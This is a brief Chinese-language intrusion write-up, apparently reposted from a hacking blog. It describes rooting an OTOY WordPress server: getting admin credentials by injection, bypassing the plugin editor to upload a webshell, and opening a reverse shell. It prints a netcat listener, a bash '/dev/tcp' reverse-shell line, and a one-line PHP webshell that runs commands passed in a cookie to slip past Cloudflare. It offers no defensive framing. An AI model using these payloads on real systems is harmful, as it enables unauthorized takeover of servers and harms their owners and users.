如何获取OTOY服务器root权限的

摘要: wordpress常见getshell方法，绕过插件限制上传webshell，绕过cloudflare反弹shell

0x1: 获取账户密码

注入获取帐号密码登录wordpress网站后台(略过).

0x2: 上传webshell

1.Media Uploader: wordpress新版本中很长时间都不可用.

2.Themes Editor: 没有写入权限.

3.Plugin Editor: 插件编辑无法激活

There was something called (inactive files) for Plugins files, If you tried to edit a file of the plugin, Only the plugin main file will be on active mode, all other files will be marked as Inactive mode, and If you edited the main file, The plugin will be deactivated and then you’ll not be able to see it on plugins again.

4.寻找现有插件的漏洞

0x3: 绕过插件限制上传webshell

plugin-editor.php?file=index.php&plugin=index.php

0x4: 反弹shell

反弹被Cloudflare防火墙拦截

nc -l -vvv -p 443
bash -i >& /dev/tcp/$myip/443 0>&1

0x5: 绕过Cloudflare防火墙反弹shell

通过cookies来传递执行的命令请求

<?php
system($_COOKIE[‘cmd’]);

Cookie: cmd=bash -i >& /dev/tcp/$myip/443 0>&1

0x6: Done ;)

原文链接：http://pwnrules.com/otoy-server-rooted/